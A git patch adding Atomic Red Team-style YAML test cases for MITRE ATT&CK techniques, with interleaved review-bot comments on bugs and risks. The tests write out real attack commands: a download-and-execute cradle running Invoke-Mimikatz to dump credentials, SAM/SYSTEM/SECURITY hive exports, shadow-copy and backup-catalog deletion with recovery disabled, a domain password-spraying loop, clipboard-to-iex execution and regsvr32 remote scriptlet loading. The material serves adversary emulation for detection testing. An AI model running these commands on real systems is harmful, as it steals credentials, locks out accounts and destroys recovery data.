From 0f7771e77d0bc788d441eafa76b4047900a157a0 Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Fri, 11 May 2018 10:55:24 +0200 Subject: [PATCH] add atomics from yaml-cs branch --- atomics/t1002/t1002.yaml | 43 ++++++++++ atomics/t1003/t1003.yaml | 58 ++++++++++++++ atomics/t1107/t1107.yaml | 155 +++++++++++++++++++++++++++++++++++++ atomics/t1110/t1110.yaml | 35 +++++++++ atomics/t1113/t1113.yaml | 66 ++++++++++++++++ atomics/t1115/t1115.yaml | 27 +++++++ atomics/t1117/RegSvr32.sct | 23 ++++++ atomics/t1117/t1117.yaml | 45 +++++++++++ atomics/t1123/t1123.yaml | 2 +- atomics/t1146/t1146.yaml | 4 +- atomics/t1158/t1158.yaml | 4 +- 11 files changed, 457 insertions(+), 5 deletions(-) create mode 100644 atomics/t1002/t1002.yaml create mode 100644 atomics/t1003/t1003.yaml create mode 100644 atomics/t1107/t1107.yaml create mode 100644 atomics/t1110/t1110.yaml create mode 100644 atomics/t1113/t1113.yaml create mode 100644 atomics/t1115/t1115.yaml create mode 100644 atomics/t1117/RegSvr32.sct create mode 100644 atomics/t1117/t1117.yaml diff --git a/atomics/t1002/t1002.yaml b/atomics/t1002/t1002.yaml new file mode 100644 index 00000000..d7448dbd --- /dev/null +++ b/atomics/t1002/t1002.yaml 
@@ -0,0 +1,43 @@ +--- +attack_technique: T1002 +display_name: Data Compressed + +atomic_tests: +- name: Compress Data for Exfiltration With PowerShell + description: | + TODO + supported_platforms: + - windows + input_arguments: + input_file: + description: Path that should be compressed into our output file + type: Path + default: C:\* + output_file: + description: Path where resulting compressed data should be placed + type: Path + default: C:\test\Data.zip + executor: + name: powershell + command: | + dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} + +- name: Compress Data for Exfiltration With Rar + description: | + TODO + supported_platforms: + - windows + input_argument: + input_file: + description: Path that should be compressed into our output file + type: Path + default: "*.docx" + output_file: + description: Path where resulting compressed data should be placed + type: Path + default: exfilthis.rar + executor: + name: powershell + command: | + rar a -r #{output_file} #{input_file} + \ No newline at end of file diff --git a/atomics/t1003/t1003.yaml b/atomics/t1003/t1003.yaml new file mode 100644 index 00000000..2226eac7 --- /dev/null +++ b/atomics/t1003/t1003.yaml 
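Review bot: The second test ("Compress Data for Exfiltration With Rar") declares its arguments under `input_argument:` while the first test uses `input_arguments:`, so the `#{output_file}` and `#{input_file}` tokens in its command presumably have no declared arguments to resolve against; change the key to `input_arguments:`. The same misspelling appears in the t1003 hunk under "Windows Credential Editor". Both descriptions in this file are still `TODO` and should state what the test writes and where. The first test's default `input_file` of `C:\*` compresses the entire system drive recursively, which is slow and noisy for a test run; a default that points at a small dedicated test directory would make the test safer to execute and trivial to clean up afterwards.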
@@ -0,0 +1,58 @@ +--- +attack_technique: T1003 +display_name: Credential Dumping + +atomic_tests: +- name: Powershell Mimikatz + description: | + Dumps Credentials via Powershell by invoking a remote mimikatz script + supported_platforms: + - windows + input_arguments: + remote_script: + description: URL to a remote Mimikatz script that dumps credentials + type: Url + default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 + executor: + name: powershell + command: | + IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds + +- name: Gsecdump + description: | + https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 + supported_platforms: + - windows + executor: + name: command_prompt + command: | + gsecdump -a + +- name: Windows Credential Editor + description: | + http://www.ampliasecurity.com/research/windows-credentials-editor/ + supported_platforms: + - windows + input_argument: + output_file: + description: Path where resulting data should be placed + type: Path + default: output.txt + executor: + name: command_prompt + command: | + wce -o #{output_file} + +- name: Registry dump of SAM, creds, and secrets + description: | + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated + via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 + supported_platforms: + - windows + executor: + name: command_prompt + command: | + reg save HKLM\sam sam + reg save HKLM\system system + reg save HKLM\security security + diff --git a/atomics/t1107/t1107.yaml b/atomics/t1107/t1107.yaml new file mode 100644 index 00000000..0f8baae8 --- /dev/null +++ b/atomics/t1107/t1107.yaml 
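Review bot: The "Powershell Mimikatz" test downloads and executes whatever `#{remote_script}` serves at run time, and the default points at a mutable branch (`master`) with no integrity check, so the code actually run on the test host can change without any change to this repository; the description should say so, and the default should reference an immutable revision or a locally vendored copy so the test is reproducible and reviewable. The "Registry dump of SAM, creds, and secrets" test leaves `sam`, `system` and `security` hive exports in the working directory with no cleanup; its description should state that these files contain credential material and must be deleted once the test is finished. The "Windows Credential Editor" test uses `input_argument:` where the rest of the file uses `input_arguments:`, so `#{output_file}` in its command is presumably left unresolved.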
@@ -0,0 +1,155 @@ +--- +attack_technique: T1107 +display_name: File Deletion + +atomic_tests: +- name: Victim configuration + description: | + Create a temporary directory and several files on the victim system for later deletion + supported_platforms: + - linux + executor: + name: sh + command: | + mkdir /tmp/victim-files + cd /tmp/victim-files + touch a b c d e f g + echo "This file will be shredded" > /tmp/victim-shred.txt + +- name: Delete a single file + description: | + Delete a single file from the temporary directory + supported_platforms: + - linux + executor: + name: sh + command: | + rm -f /tmp/victim-files/a + +- name: Delete an entire folder + description: | + Recursively delete the temporary directory and all files contained within it + supported_platforms: + - linux + executor: + name: sh + command: | + rm -rf /tmp/victim-files + +- name: Overwrite and delete a file with shred + description: | + Use the `shred` command to overwrite the temporary file and then delete it + supported_platforms: + - linux + executor: + name: sh + command: | + shred -u /tmp/victim-shred.txt + +- name: Victim configuration + description: | + Create a temporary directory and several files on the victim system for later deletion + supported_platforms: + - windows + executor: + name: command_prompt + command: | + mkdir %TEMP%\victim-files-cmd + cd %TEMP%\victim-files-cmd + type nul > a + type nul > b + type nul > c + type nul > d + type nul > e + type nul > f + type nul > g + mkdir %TEMP%\victim-files-ps + cd %TEMP%\victim-files-ps + type nul > a + type nul > b + type nul > c + type nul > d + type nul > e + type nul > f + type nul > g + +- name: Delete a single file - cmd + description: | + Delete a single file from the temporary directory using cmd.exe + supported_platforms: + - windows + executor: + name: command_prompt + command: | + del /f %TEMP%\victim-files-cmd\a + +- name: Delete an entire folder - cmd + description: | + Recursively delete the temporary directory and 
all files contained within it using cmd.exe + supported_platforms: + - windows + executor: + name: command_prompt + command: | + del /f /S %TEMP%\victim-files-cmd + +- name: Delete a single file - ps + description: | + Delete a single file from the temporary directory using Powershell + supported_platforms: + - windows + executor: + name: powershell + command: | + Remove-Item -path %TEMP%\victim-files-ps\a + +- name: Delete an entire folder - ps + description: | + Recursively delete the temporary directory and all files contained within it using Powershell + supported_platforms: + - windows + executor: + name: powershell + command: | + Remove-Item -path %TEMP%\victim-files-ps -recurse + +- name: Delete VSS - vssadmin + description: | + Delete all volume shadow copies with vssadmin.exe + supported_platforms: + - windows + executor: + name: command_prompt + command: | + vssadmin.exe Delete Shadows /All /Quiet + +- name: Delete VSS - wmic + description: | + Delete all volume shadow copies with wmic + supported_platforms: + - windows + executor: + name: command_prompt + command: | + wmic shadowcopy delete + +- name: bcdedit + description: | + xxx + supported_platforms: + - windows + executor: + name: command_prompt + command: | + bcdedit /set {default} bootstatuspolicy ignoreallfailures + bcdedit /set {default} recoveryenabled no + +- name: wbadmin + description: | + xxx + supported_platforms: + - windows + executor: + name: command_prompt + command: | + wbdadmin delete catalog -quiet \ No newline at end of file diff --git a/atomics/t1110/t1110.yaml b/atomics/t1110/t1110.yaml new file mode 100644 index 00000000..c04adfb5 --- /dev/null +++ b/atomics/t1110/t1110.yaml 
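Review bot: The last test's command is `wbdadmin delete catalog -quiet`, but the test name and the Windows tool are `wbadmin`, so the command as written cannot run; it should read `wbadmin delete catalog -quiet`. The two PowerShell tests pass `%TEMP%\victim-files-ps...` to `Remove-Item`, yet PowerShell does not expand `%VAR%` syntax, so unless the runner routes the command through cmd.exe the path is taken literally and nothing is removed; `Remove-Item -path "$env:TEMP\victim-files-ps\a"` is the PowerShell form (the cmd tests are fine). "Delete an entire folder - cmd" uses `del /f /S`, which removes the files but leaves the directory tree, so the description's "recursively delete the temporary directory" overstates what happens unless `rmdir /s /q` is used. Two tests share the name "Victim configuration", which may be ambiguous for any runner that selects tests by name. The vssadmin, wmic, bcdedit and wbadmin tests are not reversible on the host they run on (shadow copies, the recovery environment and the backup catalog are deleted or disabled), and their descriptions — two of which are still `xxx` — should say so and point to a disposable test VM.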
@@ -0,0 +1,35 @@ +--- +attack_technique: T1110 +display_name: Brute Force Credential Access + +atomic_tests: +- name: Brute Force Credentials + description: | + Creates username and password files then attempts to brute force on remote host + supported_platforms: + - windows + input_arguments: + input_file_users: + description: Path to a file containing a list of users that we will attempt to brute force + type: Path + default: DomainUsers.txt + input_file_passwords: + description: Path to a file containing a list of passwords we will attempt to brute force with + type: Path + default: passwords.txt + remote_host: + description: Hostname of the target system we will brute force upon + type: String + default: \\COMPANYDC1\IPC$ + domain: + description: Domain name of the target system we will brute force upon + type: String + default: YOUR_COMPANY + executor: + name: command_prompt + command: | + net user /domain > #{input_file_users} + echo "Password1" >> #{input_file_passwords} + echo "1q2w3e4r" >> #{input_file_passwords} + echo "Password!" >> #{input_file_passwords} + @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL \ No newline at end of file diff --git a/atomics/t1113/t1113.yaml b/atomics/t1113/t1113.yaml new file mode 100644 index 00000000..e365b5dd --- /dev/null +++ b/atomics/t1113/t1113.yaml 
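Review bot: The test performs real authentication attempts with every enumerated domain account against `#{remote_host}` (default `\\COMPANYDC1\IPC$`), so on any domain with an account-lockout policy it will lock out those users; the description only says it "attempts to brute force" and should state the lockout impact and that the test belongs on a lab domain. The password file is built with `>>`, so its entries accumulate on every rerun while the user file is truncated with `>`, and neither `DomainUsers.txt` nor `passwords.txt` is removed afterwards; the description should note the leftover files, or the test should clean them up. The defaults `YOUR_COMPANY` and `\\COMPANYDC1\IPC$` are placeholders and should be documented as such in the argument descriptions.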
@@ -0,0 +1,66 @@ +--- +attack_technique: T1113 +display_name: Screen Capture + +atomic_tests: +- name: Screencapture + description: | + Use screencapture command to collect a full desktop screenshot + supported_platforms: + - macos + input_arguments: + output_file: + description: | + xxx + type: Path + default: desktop.png + executor: + name: bash + command: screencapture #{output_file} + +- name: Screencapture (silent) + description: | + Use screencapture command to collect a full desktop screenshot + supported_platforms: + - macos + input_arguments: + output_file: + description: | + xxx + type: Path + default: desktop.png + executor: + name: bash + command: screencapture -x #{output_file} + +- name: X Windows Capture + description: | + Use xwd command to collect a full desktop screenshot and review file with xwud + supported_platforms: + - linux + input_arguments: + output_file: + description: | + xxx + type: Path + default: desktop.xwd + executor: + name: bash + command: | + xwd -root -out #{output_file} + xwud -in #{output_file} + +- name: Import + description: | + Use import command to collect a full desktop screenshot + supported_platforms: + - linux + input_arguments: + output_file: + description: | + xxx + type: Path + default: desktop.png + executor: + name: bash + command: import -window root #{output_file} \ No newline at end of file diff --git a/atomics/t1115/t1115.yaml b/atomics/t1115/t1115.yaml new file mode 100644 index 00000000..1a6208ff --- /dev/null +++ b/atomics/t1115/t1115.yaml 
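Review bot: Every `output_file` argument in this hunk is described as `xxx`; the description should say that the file is written relative to the executor's working directory and that the capture contains whatever was on screen, so it should be deleted after the test. Two tests write `command:` as an inline scalar (`command: screencapture #{output_file}`) while the others and the rest of the new atomics use a `|` block; using the block form throughout keeps the files consistent. The two macOS tests differ only by `-x`, which presumably is what "(silent)" in the second name refers to; the second description should say so rather than repeating the first one verbatim.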
@@ -0,0 +1,27 @@ +--- +attack_technique: T1115 +display_name: Clipboard Data +attack_link: https://attack.mitre.org/wiki/Technique/T1115 + +atomic_tests: +- name: Utilize Clipboard to store or execute commands from + description: | + Add data to clipboard to copy off or execute commands from. + supported_platforms: + - windows + executor: + name: command_prompt + command: | + dir | clip + clip < readme.txt + +- name: PowerShell + description: | + Utilize PowerShell to echo a command to clipboard and execute it + supported_platforms: + - windows + executor: + name: powershell + command: | + echo Get-Process | clip + Get-Clipboard | iex \ No newline at end of file diff --git a/atomics/t1117/RegSvr32.sct b/atomics/t1117/RegSvr32.sct new file mode 100644 index 00000000..697938ed --- /dev/null +++ b/atomics/t1117/RegSvr32.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + diff --git a/atomics/t1117/t1117.yaml b/atomics/t1117/t1117.yaml new file mode 100644 index 00000000..6d2b88bb --- /dev/null +++ b/atomics/t1117/t1117.yaml 
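Review bot: The first test's second command, `clip < readme.txt`, depends on a `readme.txt` in the working directory that the commit does not add and the test does not create, so it fails with a file-not-found error on a clean host; either make the file an `input_arguments` entry with a documented default or have the test create it first. The second test is named only `PowerShell`, which does not say what it does; a name such as "Execute command from clipboard with PowerShell" would match the naming of the other atomics. `Get-Clipboard` is presumably available only on newer PowerShell versions (5.0 and later), which is worth stating as a prerequisite in the description. This file also carries an `attack_link` key that none of the other new atomics in this commit have; either add it everywhere or drop it for consistency.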
@@ -0,0 +1,45 @@ +attack_technique: T1117 +display_name: Regsvr32 +atomic_tests: +- name: Regsvr32 local COM scriptlet execution + description: | + Regsvr32.exe is a command-line program used to register and unregister OLE controls + supported_platforms: + - windows + input_arguments: + filename: + description: Name of the local file, include path. + type: Path + default: Regsvr32.sct + executor: + name: command_prompt + command: | + regsvr32.exe /s /u /i:#(unknown) scrobj.dll +- name: Regsvr32 remote COM scriptlet execution + description: | + Regsvr32.exe is a command-line program used to register and unregister OLE controls + supported_platforms: + - windows + input_arguments: + url: + description: URL to hosted sct file + type: Url + default: http://www.example.com/file.sct + executor: + name: command_prompt + command: | + regsvr32.exe /s /u /i:#{url} scrobj.dll +- name: Regsvr32 local DLL execution + description: | + Regsvr32.exe is a command-line program used to register and unregister OLE controls + supported_platforms: + - windows + input_arguments: + dll_name: + description: Name of DLL to Execute, DLL Should export DllRegisterServer + type: Path + default: payload.dll + executor: + name: command_prompt + command: | + regsvr32.exe {dll_name} diff --git a/atomics/t1123/t1123.yaml b/atomics/t1123/t1123.yaml index d90a15ae..f3365800 100644 --- a/atomics/t1123/t1123.yaml +++ b/atomics/t1123/t1123.yaml @@ -34,4 +34,4 @@ atomic_tests: executor: name: command_prompt command: | - powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet + powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet \ No newline at end of file diff --git a/atomics/t1146/t1146.yaml b/atomics/t1146/t1146.yaml index 6ebd6942..79e22114 100644 --- a/atomics/t1146/t1146.yaml +++ b/atomics/t1146/t1146.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1146 +attack_technique: T1146 display_name: Clear Command History - + atomic_tests: - name: Clear Bash history (rm) description: | 
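Review bot: The third test's command is `regsvr32.exe {dll_name}` — without the `#` the argument is presumably not substituted (compare `#{url}` in the second test), so the literal text `{dll_name}` is passed; it should be `regsvr32.exe #{dll_name}`. The first test's command renders here as `regsvr32.exe /s /u /i:#(unknown) scrobj.dll`, which is not the `#{arg}` form either; if the source does not read `/i:#{filename}`, fix it the same way. All three descriptions repeat the generic sentence "Regsvr32.exe is a command-line program used to register and unregister OLE controls" and say nothing about what the individual test does, and the shipped `Regsvr32.sct` is not described anywhere (its content is not visible in this rendering); each description should state what the test executes and what the scriptlet does. This file is also the only new atomic without the leading `---` document marker.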
diff --git a/atomics/t1158/t1158.yaml b/atomics/t1158/t1158.yaml index a999c506..7d352fca 100644 --- a/atomics/t1158/t1158.yaml +++ b/atomics/t1158/t1158.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1158 +attack_technique: T1158 display_name: Hidden Files and Directories - + atomic_tests: - name: Create a hidden file in a hidden directory description: |